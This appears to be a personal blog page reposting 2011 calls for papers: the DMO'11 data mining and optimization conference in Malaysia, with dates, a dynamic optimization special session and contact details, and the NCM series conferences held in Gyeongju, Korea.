IMPORTANT DATES

---------------

Full Paper Submission:  2 January 2011

Paper Rejection/Acceptance Notification:  30 March 2011

Camera Ready Submission:  15 April 2011

Early bird Registration:  Until 1 April 2011

Normal Registration:  Starting 2 April 2011

Conference:  28 & 29 June 2011

 
----------------

SPECIAL SESSIONS

----------------

A special session on “DYNAMIC OPTIMIZATION” will be held as part of the DMO’11 conference.  This special session is organized by A. Hajjam And J.-C. Creput of Université de Technologie de Belfort-Montbéliard (UTBM), France.  You are invited to e-mail the organizers of the special session directly for further details:

amir.hajjam@utbm.fr

jean-charles.creput@utbm.fr

 
----------

CONTACT US

----------

Further details regarding DMO’11 can be obtained at the conference website below, or by contacting the Conference Co-Chair, Dr Masri Ayob, directly:

WEBSITE:  
http://dmo.ukm.my/dmo11/
E-MAIL:  dmo2011@ftsm.ukm.my

FAX:  +60389216184

 
POSTAL ADDRESS:

 
DMO’11 Secretariat

(Attn: Dr Masri Ayob)

Data Mining & Optimization Research Group

Faculty of Information Science and Technology

Universiti Kebangsaan Malaysia

43600 UKM Bangi

Selangor

MALAYSIA

Share:

2011 Information Technologies, Management and Digital World (NCM series)

2011 International Conferences in Korea(May Conferences)

2011 Information Technologies, Management and Digital World (NCM series)

Call for Program Committee Members/Workshops/Invited
Sessions/Chairs/Papers
- Dates and Venue: May 11-13, 2011, Hilton Hotel Gyeongju, Gyeongju, Korea

  • NCM2011:
7th International Conference on Networked Computing and Advanced Information Management, http://www.aicit.org/ncm
  • IDC2011:
7th International Conference on Digital Content, Multimedia Technology and its Applications, http://www.aicit.org/idc
  • INC2011:
7th International Conference on Networked Computing,
http://www.aicit.org/inc
  • IMS2011:
7th International Conference on Advanced Information Management and Service, http://www.aicit.org/ims11



Call for Chairs

We courteously invite some eminent professor/scholar/engineer as a General Chair, Program Chair, Organization Chair, Local Chair, Publication Chair, Publicity Chair, Technical Council Chair, Honorary Chair, Advisory Board.

Invitation to the member of International Program/Research Committee

We courteously invite professor/scholar/engineer as a member of International Program/Research Committee in premium and world-class international conferences organized by AICIT.

Call for Invited Sessions

Following the tradition, NCM series invited sessions will provide participants with opportunities to discuss and explore emerging areas of Networked Computing Management and Advanced Information Management with fellow students, researchers, and practitioners in special areas.

Call for Workshops

NCM series workshops will provide the participants with opportunities to discuss and explore areas related to the Theory, Development, Applications, Experiences, and Evaluation of Networked/Ubiquitous Computing and Advanced Information Management with fellow students, researchers, and practitioners. Workshops may be related to any topics within the conference scope.

Call for Papers

NCM series will be held in Gyeongju, Republic of Korea. Selected papers will be included as revised monographs in the international journals. For more details, visit the conference web. This premium international conference provides a forum to present research results in all areas related to Theory, Development, Applications, Experiences, and Evaluation of Networked/Ubiquitous Computing and Advanced Information Management.
-
http://www.aicit.org/ncm
-
http://www.aicit.org/idc
-
http://www.aicit.org/inc
-
http://www.aicit.org/ims11
Share:

About Me

Somewhere, Selangor, Malaysia
An IT by profession, a beginner in photography

Blog Archive

Blogger templates